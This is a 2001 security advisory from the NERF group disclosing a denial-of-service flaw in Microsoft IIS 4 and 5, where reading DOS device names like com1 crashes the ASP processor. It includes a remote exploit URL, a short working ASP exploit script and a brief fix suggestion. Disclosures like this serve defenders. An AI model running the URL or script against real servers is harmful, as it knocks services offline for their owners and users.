Nerf Group Security Advisory #4 - Microsoft IIS 4 and 5 can be crashed remotely by reading device files (com1, com2, etc). Exploit URL included.
0f02809f7d12dc60415cd1b19bbc6cce5a88d1a6a9c0de0f91484303085ba0d6
--== NERF gr0up security advisory #4 ==--
MS IIS local and remote DoS
1. Vulnerable soft: IIS 4,5
2. Description:
Openning and reading of device files (com1, com2, etc.) using Scripting.FileSystemObject will crash ASP-processor (asp.dll).
3. Local exploit:
If you have permission on creating .asp-file, you can crash ASP-processor.
4. Remote exploit:
Sometimes filename passing as asp-script param, which open and read data from file. Passing param as device file will
crash asp-processor.
http://host.int/scripts/script.asp?script=com1
5. Solution:
Fix Scripting.FileSystemObject (have to check file for existing before openning.
6. ASP-Exploit:
<%
Dim strFileName, objFSO, objFile
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
strFileName = "com1"
Set objFile = objFSO.OpenTextFile(strFileName)
Response.Write objFile.ReadAll
objFile.Close
%>
7.Sorry:
for poor english
---------------------------------------------------
Found by buggzy (buggzy@nerf.ru)
NERF Security gr0up (www.nerf.ru), Russia, 2001 (c)